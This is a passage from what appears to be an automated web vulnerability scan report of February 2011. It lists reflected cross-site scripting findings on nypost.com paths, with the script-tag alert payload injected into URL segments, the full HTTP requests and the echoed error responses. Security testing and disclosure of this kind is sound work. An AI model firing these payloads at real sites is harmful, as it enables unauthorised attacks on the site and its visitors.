<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472</p>
...[SNIP]...

1.245. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa0dc<script>alert(1)</script>33396eab501 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css</p>
...[SNIP]...

1.246. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 3]  previous  next

Summary